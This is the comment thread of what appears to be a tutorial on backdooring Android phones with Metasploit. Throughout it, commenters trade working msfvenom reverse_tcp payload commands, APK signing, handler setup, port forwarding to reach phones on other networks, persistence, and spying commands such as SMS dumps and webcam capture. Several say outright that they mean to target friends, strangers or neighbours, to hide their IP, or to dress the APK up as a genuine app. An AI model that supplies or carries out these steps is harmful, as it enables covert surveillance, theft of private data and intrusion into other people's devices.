Iam using asus zenfone 2 2gb modu
Anyle

It is supposed to run in the background. Take a look at the terminal, (maybe) you got a session already!

Hey! I was wondering is there a way to connect to a meterpreter sessions on an android device (that I installed a payload on) whose not on my router, I mean he uses his own internet (sim 3g)?

Yea.. when youre making payload... type your public ip...
But when youre using multi handler.. then type your private ip

Thanks for the reply Seven! But unfortunately it's not working. I created a payload apk with LHOST of my public ip (LHOST was giving error "can't validate LHOST" so I used "LHOSTS instead and it worked fine) and it ouputted the apk. Installed it on my phone (phone was on own sim 3g) , setted up a listener with my private ip and it just kept loading (looking for meterpreter session). But when I connected my phone with wifi (same network kali was on) the session opened! why couldn't it open on 3g?

Its lhost not lhosts.. lhosts wont work... maybe you typed something wrong thats why its giving error..

It might also be that your internet on 3g isnt working.. maybe no network.. But the main reason is lhost... search public ip on google and enter that with lhost..

If youre still getting error send me a screenshot of code...

I have everything set up to start, but when I went i went to forward the ports, I could not find the port forwarding option in the router configuration. I am leaching off of a neighbor's router (with his permission). The router documentation says it should be there, but it's not. Do I have to be hard-wired to the router to configure port forwarding? The router is D-Link dir-610 B1, and it's built for the Brazilian market. I have an email out to dlink support, but no reply yet. Any help appreciated. By the way this is the best tut I have seen on the web.

edit: The only options available under advanced are: port triggering, dmz, url block, dynamic dns, traffic control, upnp, telnet, virtual server, ipv6 filter, ipv6 routing.

Thank You Robbyd123, Follow this guide... for forwarding ports.

In the Virtual server option,

• Use user -defined service.
• Enter any name of the service.
• Protocol: TCP/UDP
• WAN and LAN Ports: 4444
• LAN IP: (Internal IP of Kali system)
• Apply Changes.
• (You can also use DMZ)

Don't test the ports using port checker tool.

Just execute the hack by WAN method. (Public IP while creating payload and Private IP while starting a listener(multi-handler))

Let 'us' know if it works ;)

I'm really new to this and when I try to enter the info into the terminal I get a message saying no such file or directory. I am on a macbook pro. does that make a difference. please let me know what I may be doing wrong. thank you so much

Welcome Janice!

We are using Kali Linux for our hacks. You will need to install it. There are numerous tutorials here on how to do that.

Alright. So, this works on LAN just fine. But I'm unable to get it to work on WAN. I've forwarded the needed ports. I've put the kali machine in the DMZ. I don't know what else to do. My router:

System: ARRIS DOCSIS 3.0 Touchstone Data Gateway
HWREV: 2
VENDOR: Arris Interactive, L.L.C.
BOOTR: 1.2.1.62
SWREV: 7.5.125
MODEL: DG860P2
Serial Number: E4PBUB454275036

Any suggestions?

I run an SSH server from another machine just fine.

EDIT: Also, when on LAN, it shows this:
192.168.0.5 -> 192.168.0.1
Wouldn't it be my android device's IP instead of the gateway?

EDIT: Now, when I connect via LAN, after a couple seconds it says Meterpreter session closed. Reason: Died.

You need to make another apk with lhost as your public/wan ip.. then when using multi-handler... type in your lan/private ip.. then exploit...

If you close the app on android... the session dies..

Hey F.E.A.R,
when I want to install the APK on my phone it says:"parsing-mistake"

Try another file manager.. play store..

Excellent tutorial. Just a couple of questions. Can I use a dynamic dns name instead of a public ip address. IE. name.servehttp.com. Also, can my ip be tracked, would it be a good idea to use a vpn or something when deploying Trojan.apk

Absolutely you can.... use dns...

Ofc your ip can be tracked.. a vpn is really a good choice!!

may i ask.why when i type help.no android command appear..

These are android commands...

You can execute a custom script by uploading to the phone or you can only run the commands that are specified in the above pic..

To capture a pic use the webcam-snap command and so on..

so mean i can not run android command such as dumpsms?

There is a command to dump sms.. just scroll up and look for it!!

when i type help ,just appear until webcam command, and no android command out. then when type dump sms it's give error say invalid command. anyone know how to troubleshoot the problem?

Can you get a screenshot of the payload creation and listener please?
(Also the command is dump_sms.)
Try this command too: webcam_stream

there are the command i use to run main activity.like u see i only can run webcam command.and get error for android command. plez suggest solution for my problem. the main problem is why android command such as dumpsms not appear in my machine?

Hmm.. Unusual.
1) Try to create the .apk using msfvenom:

• msfvenom -p android/meterpreter/reverse_tcp LHOST=(internal ip if LAN or public ip if WAN) R > /root/abc.apk

2) If doesn't work UPDATE Metasploit Framework:

• msfupdate (while in console)

I can see, that your's is a little outdated. (latest v4.11.4 I think)

3) Try to exploit another android system, if all else fails.

i have try using msfvenom, but the apk not generate application name main activity. and when i try to install the application, it's give error installation.

it's seen like error while i use msfvenom. do u know why it's happen?

The (Raw) Payload is created, just move on with the Hack.
Did you update metasploit framework?

i have update metasploit but at the last it's write no update available. i am using kali linux 2.0 and when i move the apk to android, the icon not appear like M. did i have wrong something?

Replying to you at the bottom of the post (9/10/15)

Wow. . Sorry I meant to reply down

About WAN,can u tell me plz how should i use my public ip??
I1ve some trouble with port forwarding...however i used these commands to do that:
#iptables -t nat -I PREROUTING -p tcp --dport 443 -j DNAT --to 192.168.102.100:443
#iptables -I FORWARD -p tcp -d 192.168.102.100 --dport 443 -j ACCEPT -s 443

and when i set lhost my public ip and lport 443:the result is :

• Handler failed to bind to [my public ip];443

Thays ok... the handler will bind itself to 000 something.. just check if it still works on your phone..

ok,then what can i do?

Give me details of your Router...
(I am assuming that you have successfully tested the hack on LAN)

TD-8817 TP-LINK ADSL Router
so,is there something wrong with port forwarding?

Click here for the guide
Internal IP is of Kali.
Port: 4444 (Both in start and ending)
Do this, then I'll give you further instructions.

Let the error display..
Proceed normally...
Install and open app on phone and see if it works..

hellow guys,
I entered the command (a little custom) and created the apk with the folowing command

msfvenom android/meterpreter/reversetcp LHOST=192.168.1.221 LPORT=8080 R > /root/Documents/payloads/andro.apk

But then if I want to install the apk on my smartphone, it says something that the file blabla but I figured out that the apk just has 0 bytes so does anybody now why this is?

Pleas help me out...
Thx anyway.

@BruggeBOY BOy i'm facing the same error!! after creating d paylaod using msfvenom android/meterpreter/reversetcp lhost=xxx.xxx.x.x lport=4444 R > andro.apk

the apk is created but it is 0 bytes!! any help or solution for this would be appreciated!!!

Is the syntax correct?? I think theres a -p also.. are you getting any error in msfconsole?? And you dont give that many space...

You gotta get the syntax correct.. and mind the case sensitive.
The apk would be about 8 kb..

yeah I forgeted my -p

@BRUGGEBOY BOY -

ok dude!! i got d solution for it!! instead of creating your payload in d msfconsole...create ur payload in root terminal msfvenom -p android/meterpreter/reversetcp LHOST=xxx.xxx.x.x LPORT=4444 R > andro.apk now i'm damn sure ur payload will be around 8.3 kb then open ur msfconsole 4 d exploit! :) i hope this helps ya!!!

thx man ,really thx

goddamnit i got again the same problem ... other idees?

srr by the way

It is IMPOSSIBLE (except in rare cases of bad metasploit install or bug) that a problem appears If you've done as it is written. Please check your syntaxes and try again. Everything seems good using: msfvenom -p android/meterpreter/reverse_tcp LHOST=x.x.x.x. LPORT=4444 R > evil.apk

However, you might run into a problem where the app won't install because it hasn't got a signature. You can fix that by running d2j-apk-sign /root/evil.apk Then install the signed apk.

kay yes you are right is just mispelled it (agaiin)

Can somebody please tell me the difference b/w LAN & WAN method?....
Also can i hack my friend's mobile who is not connected to my wifi?

yes you can do it whit your friends mobile , you just need to port forward then so just the command LHOST=....
I think

Hello i was jsut trying this out however when trying to create the .apk i get the following error:
! ************************************
! The utility msfpayload is deprecated!
! It will be removed on or about 2015-06-08
! Please use msfvenom instead
! Details: https://github.com/rapid7/metasploit-framework/pull/4333
! ************************************

I have used this same method to create the .apk however i did not have this error appear. Any response would be appreciated :). Thanks

msfvenom -p android/meterpreter/reverse_tcp LHOST=(internal ip if LAN or public ip if WAN) R > /root/abc.apk

msfpayload android/meterpreter/reverse_tcp LHOST=192.168.43.1 R > /root/Upgrader.apk
bash: /root/Upgrader.apk: Permission denied

Hi , I am very respectful to begginers and anyone alike but please, the sentence says use msfvenom instead clearly. If you are still unsure, try googling it. I won't, and I believe noone here will hesitate to answer your question, but without doing some research first yourself, you are denying time to some contributors they use to write good guides for you.

Just a heads up. Good luck.

Msfpayload has merged into msfvenom..
Use msfvenom instead!!

Ill write a tutorial on msfvenom soon...
Lots of people having issues

There is an article on msfvenom here.

I meant for android...
Including the faq...

Wahee:
The icon does not appear like 'M' because it isn't supposed to.
Just continue with the Hack and tell the End Results.

Yea I think its a green android icon yeah??

yes. it's green android icon. i have continue hack . and lastly my machine have show android command like dumpsms. but i have another problem like the session closed. (reason died). it's happen 1minutes after i exploit the android . and the worse it happen again and again until i got problem to run meterpreter.

If you close the app on your android.. the session will die..

no i"m not close the app. the session die automatically when i type exploit

Ok first you started the handler...
Then you opened the app..
Then you type exploit?? Why??

Does your phone has antivirus or some phone booster which maybe freezes the app aftr a minute??

no. i don't have any antivirus in my phone. please help stable the session. and i 1 more question can i use dynamic ip to run the apk?

Make use of persistence is the session dies.
You would have a whole 1 minute to do so, it will be easy:
Here
Edit: is-if*

can i edit timeouts meterpreter using command gettimeouts.
eg : meterpreter > gettimeouts
Session Expiry : @ 2015-06-09 19:56:05
Comm Timeout : 100000 seconds
Retry Total Time: 50000 seconds
Retry Wait Time : 2500 seconds

it's will work to avoid session closed(reason died) ?..

Yes you can

how? explain please.

but what if victim is not on same LAN or network should I set LHOST to my public ip ?

Yes, only while creating payload.
Also, forward the ports used to establish the connection. (4444)

The apk file is 0 bytes every time I make one and when I try to install it on my phone it says the was a problem with parsing the package

The apk will be about 8 kb..
If its coming 0kb then either you have a syntax or spelling error...
Recheck

and listining on ? My public ip which I used to create payload or LAN ip ?

nc 192.168.x.x:443

Am I doing it right?

Lan ip..
And the command is

Use multi/handler
Set payload andr...
Set lhost 192...
Set lport ...
Exploit

And the lhost is local private ip..

Nc u mean netcat??

I'm trying it on a private network with my HTC One M8 and linux Kali, but i have some issues/questions:

1. Why i can't download a jpg for a "operation timed out"? And what is the command to download a directory? I tried download ./DCIM but the error is "operation failed" this way.
2. If the process get killed by an app like battery doctor or just a phone reboot it don't restart itself, i can't get it with restart every x minutes somewhere?
3. Can i have more process in one time, for example looking webcam stream and dowloading or moving through files? Cause i don't know even how to stop stop the stream xD

EDIT: in step 1 it seem that i found the command to download directory, i missed the final /. But i get again the error "operation time out"

Post exploitaton on android is really troublesome... you would have to search on google..
I cant even snap a pick from the mobile's front cam.. useles...

Awesome tutorial i am having troubles with virtual box when i set my LHOST it doesn´t work, and if I type ifconfig ii give me a strange IP just like: 10.2.0.0 kinda, I think is the configuration of network, I have it on NAT what could I do?

Hello Vlad,
Virtual box has issues, you should switch to VMWare (11).

That IP is of the latest types of Internal IP, it's not strange, usually found as default in NET-GEAR routers. You can change it by logging into your router's config webpage and switching to the older ones (192.168....)

what should i do!!!
i am NOOB
tried many times on backtrack 5r3 also

msfpayload don't work anymore, you need to use msfvenom, read the comments it is already explained

Hi,so where we can find lhost?by typing ifconfig

hey i did everything right also installed apk on my phone but it is stuck on payload handler

Thanks for this tutorial F.E.A.R.
I'm having problem with port forwarding.

My connection is double routed. From ISP router to mine. So I cant forward because my ISP does not allow port forwarding.

So is there any other way to portforward my port or any alternative other than changing my ISP.

A vpn will work...
Or maybe a dynamic dns like noip.. try it..
A free one is duckdns

That is a very unpractical situation i must say. I haven't heard yet that an ISP controls all the port forwarding. What about torrents and other services that require any average user to do some portfwding...I guess that you can issue them a list of ports you want open. I don't see other solutions here since they hold the main gateway. meterpreter packet will be dropped straight away on their end. They need to specify your router IP as the destination for the packets on a selected port then make your router handle it for your internal computers.

well i have successfully tested the hack on lan but for wan i tried alot but i could not meet the result...for first terminal i used my public ip then for 2nd terminal i used my private ip and also i did everything to port forwrd my port on router as well as i used bittorrent client on my phone to forward the port and i got success at can u see me.org but even then i could not establish the connection between server and listener...what should i do...my modem is binatone dt 850 w

You must have not done port firward succesfully..
And is your phone on mobile data?? Maybe its just not getting network..

my phone was on wifi...thts y i could successfully portfrwrd the port through torrent client on my phone...

i have already tested the hack successfully on lan so could it be wrong with my port forwarding?

please help me soon we can talk on whatsapp if needed...i can post my screen shots their

Solution: here (if ADSL2000) or here (if ADSL2001)

does port forwarding open ports or only triggers it ?

There is a difference between port forwarding and port triggering

oh sry its forwarding

can anyone help me hack an android phone that is located in lebanon ?

You need to use wan..
Go Here

i cant forward my port with above infos...plz any other help plz

Search google port forward and your router name

well i already did tht and forget it let me know if you could help me with forwrding ports using bridge mode

guys if any one is facing problem in port forwarding...i can help u....n admin just i need one help...i did the hack...but is there any command for whtsapp details?

Download it's database and decrypt it if you can.

after so many days of hard work i find this so boring....why cant it record audio more than 1 or 2 seconds

You have to specify the amount in seconds to record audio.

And this wasn't for Entertainment.

couldn't install the app as the phone says parsing error coz the file upgrader.apk was of 0 bytes and in the terminal it does not go beyond starting the payload handler

If output file is 0 bytes, you typed something wrong. Check all previous comments for more hints.

hello i want ask why my antivirus can't detect this apk while scanning antivirus? how to prevent hacking using metasploit?

If your antivirus is good enough, then it will automatically end the session, if the app is not completely trusted or encoded.

'It' records for 30 seconds but the meterpreter session ends within that period (antivirus, as told before) it cannot produce a .wav file and instead gives out an error.

Go to Anti-Virus settings and change it to 'Trust the app completely'.
You can also try encoding or signing the application for better results.

but I do not have any antivirus on Android. how it can be due to antivirus?

Are you sure? Maybe it's pre-installed.

Even I had a doubt about android antiviruses, but using antivirus pre-installed in Mi Phone, and CM Security, made it all clear.

Try the second method stated, in my comment above.
From here

Hey F.E.A.R, awesome tutorial and everything worked as a breeze for LAN, But no matter what i cant seem to get it running on WAN

I have a Cable Modem- Xperio Labs XL-8130 W22(which i couldn't find in guides) i'll attach snaps of my router's config page. :)

Thanks in Advance F.E.A.R

Welcome Gokul,
Looks like you did everything right, (forwarded the internal Kali's IP etc.)
There is an alternate way to go about this, is default DMZ server.
In the DMZ section, you just have to provide the internal IP and it will forward any port(s) for you automatically.

If it still doesn't work out look into the port filtering section and check that all the incoming and outgoing traffic is allowed.

Thank you for your reply F.E.A.R, i actually read about DMZ in your comments above and tried that too still no luck :( should i configure anything in the 'VLAN' tab

here is a snap of my port filtering tab, please tell me if i can use it in anyway :)
Thanks a ton for replying :)

There is nothing else that can be done.
Are you sure you have forwarded the ports to correct IP?
If the DMZ is enabled than there should be no problems.
Disable any external AVs and try again, also there is one more thing:

Un-tick the Port Filtering option before creating the port service.

can u please tell me how to port forward external ip to internal ip???

hi gokul i think we have same router. Is wan setup worked for u? how did u forwarded ur ports from external ip to internal ip?

Hello,first of all i wanna thank you for this tutorial !!

Also i have some trouble with the .apk file or even when i do .exe for windows i have the same problem it stays to 0 bytes no matter what i do it creates on my folder no errors when its happening and still 0 bytes file size.

The screenshot of what i mean ,sorry for not making it in my previous comment.

That means when youre makin the apk file.. you entered something incorrectly.. syntax error or spelling mistake

how to set an ip address so that u can hack someone outside ur lan

Exactly. Everyone is showing an example with an IP of the host something like "192.168.x.x" or "10.10.10.x"...

Can this be done if host and victim are on separate networks, directly connected to the internet?

Did anyone actually tried to do this outside local IP addresses ? From the beginning to use your public IP and the phone to be connected on public network also.

Locally it works great, but when the host and the phone is not on the same network (WLAN) it doesn`t work.

Did anyone really tried this?

Yes, haven't you read the comments? Well, I can understand why...
It works over WAN with no problem, if carried out correctly (it's called WAN not WLAN, there is a difference)
If you don't want to go through the comments then:

A guide here explains this in FAQ.

App not installed... 3 devices tested. is it security? or the the exploit is outdate ? or what...

Did you sign the apk ? Even if 'unknown sources' is enabled, you won't be able to install unless it's signed.

Here

I followed the signing guide but it seems I didn't do it right... didn't understand exactly how to do it !

Try to follow closely the guide, then post a screenshot of the output of your cmds. It's very hard to help you fixing if we don't know what went wrong, and usually error messages are quite explicit.

It worked now :) So anyone has a list of all the commands that u can execute ?

I have two tutorials on Meterpreter commands and scripts .

Thanks, tried migrate on android but it didn't wanna work "Unknown command: migrate"

Many of the commands and most of the scripts do not work on android. They were developed for windows, primarily.

then maybe having a list of meterpreter commands on android would be great too!

ok
a green android app running in background.
NAT mode in virtual box.
>exploit
starting the payload handler
and nothing after that
THEN CHANGED TO BRIDGED MODE
Although there was no ip shown through ifconfig,but still used the previous one
but the same stuck up problem.
what could have gone wrong????

First thing to do is to switch to VMware instead of Virtual Box.

HI FEAR Can u plz tell me how to forward the ports for wan? When am using lan its working perfectly but not working over internet?

My wan ip and public ip is different will port forwarding works??

Search here:
www.portforward.com
--OR--
Give me your router details.

Hey plz tell me where and how can i find my WAN address?

Type this on any search engine's search bar:
What's My IP

... or run this if you need to script it or have a cli fetish

curl icanhazip.com

Dear fear i use ternet on kali with mobile hotspot is it possible to forward port on mobile hotspot

Hello, I tried using my public ip address while making the payload and sending someone on the other network.
But it doesn't seems to work.
I also tried port forwarding.
But Listener doesn't gets anything when i execute the apk file.
I talked to someone and they said it is not going to work until i have a static public address? Is it so?
Thanks.

Hey F.E.A.R

After a month of heavy fighting with my ISP i managed to forward my ports, it seemed they had been blocking the ports :D

And WAN works fine but there is a new issue, After my session gets connected through WAN i can execute only core commands, Commands like cd, ls, webcamsnap etc wont work... any idea how to fix it ?

thanks in advance :)

Hey F.E.A.R
Can you Plz tell me how to hack using wan ip step-by-step
/\
It is working with LAN IP but not with WAN
I also forwarded ports which are- 4444,80,8080 but nothing is happening
I'm using KALI LINUX on vmware with bridged network

Hi F.E.A.R,
i created the apk but my phone says "parsing error" while installing.can i get some help ..please.

hi.
how can i change my vmware local ip ?

because my local ip in kali is 192.168.223.128 that is not in my modem range and i can't port forwarding. please help me

Hey Dear Fear,

Ive updated the Kali version to 2 and from there on, idk what is going on with my ip. when i do listen on every backdoor i put, it shows listening to 0.0.0.0/(port). I dont know why it happend but here take a picture of what Ive seen when typing 'route -n':

as u can see, my ip is related to the gateway 0.0.0.0 while my gateway is 10.0.0.138 and I need help with that :D

help me with port forwarding FEAR im using TP-LINK wifi router

hey i am using kali in virtual box ,how to copy file into my android
?

H-E-L-P Ive established a meterpreter session successfully , Im port forwarded on <open port> for L PORT and my web-server is running on <open port> in kali . However when i get the meterpreter session i only see the core commands and not the android commands ? After i run the exploit . So I have a session but when i do a ? for help to list commands i only see meterpreter core commands and not android commands ? Any help would be great . PS My PAYLOAD is set to android/meterpreter/reversetcp all my handler parameters are as should be , AND my payload.apk is corresponding to all the correct info EG : L HOST AND L PORT

It works on my LAN but recently when i used it on the WAN the Androids commands don't show up ONLY core commands , what could be causing this? it works perfect when my device is using the same dhcp server from my router but not on its own cellar connection when port forwarded

hey i just need to uninstall upgrade.apk in my smartphone. can anyone help me in this..

Hi F.E.A.R I just wanna ask why the backdoor file size is 0 ? Everything worked perfectly but the backdoor.apk didn't open on my android device because it's size is 0 I used mafvenim Kal ilinux 2016 please reply or any could help me!

Im not FEAR but use -- msfvenom -p android/meterpreter/reversetcp LHOST =192.168.1.X LPORT=442 R > var/www/ payload.apk

So I have tried everything i can think of , the apk does not install problem parsing package, I set it in prop and I am using es file explorer. On android 5.1 and 5.0 verizon and atat. Please help asap

go to security settings in the phone and check UNKNOWN SOURCES then install the apk

In the first step,when I typed the msfpayload command, it gives an error "bash: msfpayload: command not found".Please help sir!

use -- msfvenom -p

Guys pls help me, i am new to kali linux.... i successfully created a trojan in LAN but now i want to create it on WAN. so should i paste my public ip after LHOST=(my public ip} or what should i do? i did it but the size of the apk was 0 kb what is the problem pls explain! (i have post forwarded my port} thanks in advance!

msfvenom -p android/meterpreter/reversetcp LHOST =my public ip LPORT=442 R > var/www/ payload.apk

PORT FORWARD ON 442 , THE 0 BYTES MEANS YOU HAVE NOT CONFIGURED THE MSFVENOM - P CORRECTLY

hi.
Im using Kali in Oracle VM Virtual Box.
I tried the Wan method. I dont have a wifi but an adsl connection.

The program is installed on my phone but when i tried exploit nothing happens.

Can you please explain why?
Also i dont have a clue on port forwarding.

you need to enable wifi on the router and then connect the phone to your routers hot-spot your attacker machine can be cable as long as its all on the same LAN , if you want to use on WAN then you need to include public ip in the payload for LHOST and port forward the LPORT same as in the payload.

ps virtual box sucks use VMWARE

halo F. E. A. R thanks for ur greate article. i dont know if anyone else has asked this question. im using a dial up modem and every time i reconnect to internet my ip address changed. so im so confused what ip should i type in the terminal. can u help me? thanks

and could u give me a link to ur 1st post

My WIFI was left unsecured after a recent "IT help visit", & even since it has 14 people who have leeched it leaving me a huge bill

The only way to get these freeloaders to come forward is to hack their account password & change them till the come ask for it (gmail, facebook, or anything else on their phone)

Most are ANDROID phones/tablets
What would be the simplest way to do this ?
There are all Android users on my OPEN wifi network

First, close your open network. Use WPA2 and create a complex password. That will boot them off your wifi. If need be, use MAC filtering on the router as well.

Hi OTW,

Thanks for you quick reply... done all u said above already...but what I want to do is find out who these guys are, get maybe their Facebook/email passwords now

Since they are going thru my wifi router I reckon it should be possible right? Its a ASUS router & I can make a GUEST network too that I intend to do so I can sniff/ do a MITM or something more appropriate that you would advise

I used to use BT & do a SSL strip via Ettercap & log facebook/gmail/yahoo passwords after that using Wireshark from Laptop users.

Problem I have now is these connected are Android mobile phones - so what kind of data/account info can I actually hack into to identify these people & how ?

hey

I am new to network and its stuff, want to try hacking android remotely over internet. Can you please tell me a little briefly on the point: You can also hack android on WAN i.e. through Internet by using your Public/External IP in the LHOST and by port forwarding.

What is port forwarding exactly and how can i do that, also how do I use the public or external IP address.

hey hi..... i m having problem with metasploit.. when i enter 'msfpayload android/meterpreter/reversetcp LHOST=192.168.0.4 R > /root/Upgrader.apk' this command it says "bush msfpayload command not found"

tell me about"hack android on WAN i.e. through Interet by using your Public/External IP"

you have to use msfvenom -p

I can't install that file. It says Application not installed.. Why is that?

prob cuz the phone security settings labeled " Unknown Sources" is deactivated

hellllllllllllllllllllllllllllllllllllllllllllp

UPDATE META-SPLOIT BINARY'S

command
apt-get update && apt-get dist-upgrade

also verify you have latest version of ruby

no

sir please help me i want to hack android mobile which is on another network .
i m connected to internet through my mobile hotspot.
i used port forwarded app on my mobile. and set it as -
Incoming port on the device - 4444
Port on target device - 4444
Protocol- TCP

while using an external usb wifi adapter on kali vm ware
what will be my LHOST,whether eth0 or wlan0mon???

is 4444 a standard LPORT or i have to find one for myself for my local network?

ok.i used my LHOST as the LOCAL HOST SUBNET ADDRESS FROM virtual network editor option in vm kali.
port is standard as 4444
installed the apk in android lollipop
but neither it is opening nor running in the background.
also when i type exploit it says

• Handler failed to bind..........
• * Started reverse handler on 0.0.0.0:4444

* Starting the payload handler...

I'm feeling a little stupid here.

I'm trying to download this onto my phone to test it out but it won't install the .apk.

just says

Parse error
There was a problem while parsing the package.

any help would be greatly appreciated

hallo can i know please why i am having an apk file with 0 bytes i am doing all but the downloader.apk is (0 bytes )

please some explanation

The file won't open within the phone, idk if it's suppose to be like that but even if it is my listener isn't picking up anything. :(

hey guys
i did any thing like you said
i need to use on WAN
how we knew that what must be LPORT ???
i used 192.168.1.106 and port 4444 and port 4895
for msfvenom i use my isp ip = 182.X.X.X
for handler in msfconsole i used = 192.168.X.X ( ifconfig )
signed apk too
but when exploit its just nothing...

guys
am i doing port forwarding right ?

Suppose apk is installed on many phones.
and many sessions established , then how to give commands for all these sessions.
Please guide.

hi sir,
am using kali 2.0, in that cant able to create .apk file plz tell me how to create .apk file

i am sorry but i am really new to this type of thing but i am trying to learn more , right now when i write exploit and install the apk on the phone it gets stuck on starting payload handler and doesn't open a session or anything i am doing over port 80 over wan the port is opened i checked i am also using vmware can you please help me

plz some one tel me how to hack andorid phone when using other mobile data network???

Hi,
i am using VMware and my router is D-link 2730U
and also i have port forwarding, port mapping, Port triggering, DMZ and NAT in router configuration,
i have completely got confused HELLLLLLLLLLP me please
i had test this technique before with an android OS running on the same VMware
but now i cant do this even on local network (testing with a real android phone connecting to my router)
i don't know where is the problem exactly

is there rat or something to remotely accesss a pc in kali linux(pre installed).If not then pls tell one which is safe to download

Helllo Mr. F.E.A.R,
i am very much impressed with the tutorial and tried it out on same network.
Further i tried to get it on different network but the same is not working.

I tried port forwarding on router belkin but invain. i replaced router with binatone still i am unable to forward the ports.

could you please help me in this port forwarding issue ( I've tried everything dictated on most of sites)

Please Please Please Help.

Hello, I am now Using Binatone router model WR1500N
Please Somebody help for port forwarding on above mentioned router model.

:'(

i started that but i got this "bash: msfpayload: command not found"

i tried msfvenom but it made the apk file but when i sent it to my victim, it failed after session started. but if it connect it will give me this when i type in "webcam_snap"

Error running command webcam_snap: Rex::TimeoutError Operation timed out.

whether they could make one command to take pictures of all the android who have been infected backdoor..?

First I want to say that you guys do an excellent job. I have no problem following your well written tutorials. On this specific tutorial everything works great. The only problem is once I close the listener terminal and come back later to reconnect. The listener is unable to connect until the victim clicks on the "MainActivity" app again.

How can I fix this to be able to connect at any time without the victim having to click the app every time?

Thank you.

FEAR

Hi Sir

This is how my routers port and ip settings look like (Leopard is the name)
I put source IP = linux internal IP
SPort= 4444-8080
is this all it takes for port forwarding ?
Thanks for all your great articles

When I run any commands I get back this error:
Error running command webcamstream: Errno::EACCES Permission denied @ rbsysopen - dNdwyGKx.html

Hello LUKE TOMPKINS
You are not the root user in linux os (I think).
In order to fix that start the commands with "sudo" .
Like the following picture.

hello Dear
how do I port forward
iam using mobile hotspot instead of router or ether internet connection
Please reply soon
try to reply today
thanaks in advance

hello dear
how can i regain hacked device
after shutting down system

it is only working for the devices which are connected to my wifi.. is there any way by which it work with all the devices (which are not connected to my wifi) ??

thanks in advance..

well this is because you are doing this on LAN to connect with devices which are not on your network you should do it on WAN to do it on WAN instead of using you local ip you will have to use public ip and port forwarding

well can i use the same payload for different devices ? and if i can then how will i differentiate between different devices as i will be connected to them from same ip

i want to ask when i close the backdoor apk in my android, the meterpreter session in kali linux dies! is there any way or anything through which we can make our backdoor or hacking apk to run continuously in android and the meterpreter session in our kali linux won't die or any other advice or anything.. waiting eagerly for reply

Thanks for the great guide! I just wanted toknow how to port foward and all that. I'm planning to do this over WAN. Would appreciate a reply or link to a comment that already answers this

Hi and thanks for the tutorial.
can you put the wan method
and can you explain the forward method .
thanks again

Sir can we access different phone using this method.i cant access any other phone with the upgrade.apk file .

Thanks For The Reply .. Thanks Again

when I trying to hack android device using the above commands , I am stuck in the metasploit..the metasploit command is not comming..

am not able to do it over wan plz help mi

this is the error i keep getting.
Any suggestions?

the apk file which we created using msfvenom that apk file does not hack another android phone which is using another Network

how to hack android phone in different network

hi. im getting the session open but its not giving me the meterpreter to do anything else

Hi.. I'm getting this one after exploit: exploit running as background job 2.
and meterpreter prompt is not coming.

I know I'm a bit late, but when I try to open the app on my phone, nothing happens neither on my machine nor my phone. I did the setup correctly, but it seems to be operator error. Is there something else I need to do? This is the first hacking attempt that I've done so far... Thanks in advance! By the way, I'm stuck on the "Starting the payload handler..." part.

When i type exploit it display an error
{
* Exploit running as background job 0.

• Handler failed to bind to 47.247.84.237:4895:- -
*

Started reverse TCP handler on 0.0.0.0:4895
}
please help me to solve the problem

Thank you for the helpful guide. I've successfully connected to the host. I want to know that can I connect it again without installing the apk again. If can please tell me how.

kindly solve this issue plz

hay plz hepl me i got stuck at last

I allready new this for years, and it worked fine. But when I want to hack the same phone again, it says that it is allready installed. So I deleted it and reinstalled it again, but still the same, how to solve the prob.

how to make our own private ip ?

I know I'm 3 years late to the part, but after looking in the comments I discovered that I had to use msfvenom instead of using msfpayload. My problem is that even when I use msfvenom Kali still returns Command not found. If anyone knows why, please respond! I couldn't find anything on the internet about msfvenom not existing!

Hi,

can anyone show me how to do this attack useing a VPN or anything else that prevents my actual IP-Adress from being tracked? pls help me xD

hey please help me..
msfpayload android/meterpreter/reverse_tcp LHOST=192.168.0.4

which ip should i provide in lhost..??
for me or the victime??
reply me fast plz

can u pls make tutorial on how to decompile apk to other apk like facebook instagram youtube so its look like genuine .

"Copy the application that you made (Upgrader.apk) from the root folder, to you android phone." So i should have access to the phone i'm hacking?

After exploit I did't understand what to do plz tell me what to do

Hy everyone im new here hope to lean kali linux, i get this errow
root@kali:~# msfpayload android/meterpreter/reverse_tcp LHOST=192.168.1.102 R > /root/Upgrader.apk

bash: msfpayload: command not found
what am i doing wrong?

use msfvenom

You are entering the commend wrong. the commend is msfvenom -p android/meterpreter/..... NOT msfpayload.

This method is so old. This method won't work anymore on the new android phoneand actually there are many videos and posts about this method.

Do you have any new easy safe and quick method so that it could be done in no time???

webcam_stream player issue
Streaming on too large size

Below is the code of that html page

<html>
<head>
<META HTTP-EQUIV="PRAGMA" CONTENT="NO-CACHE">
<META HTTP-EQUIV="CACHE-CONTROL" CONTENT="NO-CACHE">
<title>Metasploit screenshare - 192.168.8.101</title>
<script language="javascript">
function updateStatus(msg) {
var status = document.getElementById("status");
status.innerText = msg;
}

function noImage() {
document.getElementById("streamer").style = "display:none";
updateStatus("Waiting");
}

var i = 0;
function updateFrame() {
var img = document.getElementById("streamer");
img.src = "zmVCzLSp.jpeg#" + i;
img.style = "display:";
updateStatus("Playing");
i++;
}

setInterval(function() {
updateFrame();
},25);

</script>
</head>
<body>
<noscript>
<h2><font color="red">Error: You need Javascript enabled to watch the stream.</font></h2>
</noscript>
<pre>
Target IP : 192.168.8.101
Start time : 2019-10-23 21:23:41 +0500
Status : <span id="status"></span>
</pre>
<br>
<img onerror="noImage()" id="streamer">
<br><br>
<a href="metasploit.com" >metasploit.com</a>
</body>
</html>
I don`t understand why this happens

for some reason my phone is unable to parse the package
any suggestions? followed all the steps

Please I need python script that can be used with kali linux to control (ON and OFF) LIFX smart bulb and also for Belkin smart power switch. This is very urgent!!

Or better still , can someone provide a resource place where I can get attacking scripts (python) that will work with kali linux for attacking smart home devices. This is for a project and not intended for negative impact..

Thank you..

hi i have problem with payload

working on LAN with LHOST=private ip but not working with LHOST=public ip and not working on WAN also.

i ve error exploit completed but no session was created
and my attack is not working on outside netwrok
while i ve done port forwarding
port forwarding is not working

i am getting permission denied while creating an msfvenom apk
how can i get rid of that

can i use my proxy instead of public ip?

Although i got the same result. But sometimes the app doesn't install properly. I got the solution from wormcorp website.

What is ip forwarding and how can I do it ?

after creating the apk file and when sent to android and tried to install ,it showed "cannot parse the apk"

What should i do in order to make the apk parsable on my android??
btw mine is a android 10 color os ...is it stable?
And by the way thanks F.E.A.R for sharing this wonderful hack.

Hacking Android with Kali Linux :

We need some new tricks, this tutorial is very classic, and 40% works with only people who have very low knowledge, I hope you can include some social engineering tricks so it will become more efficient .

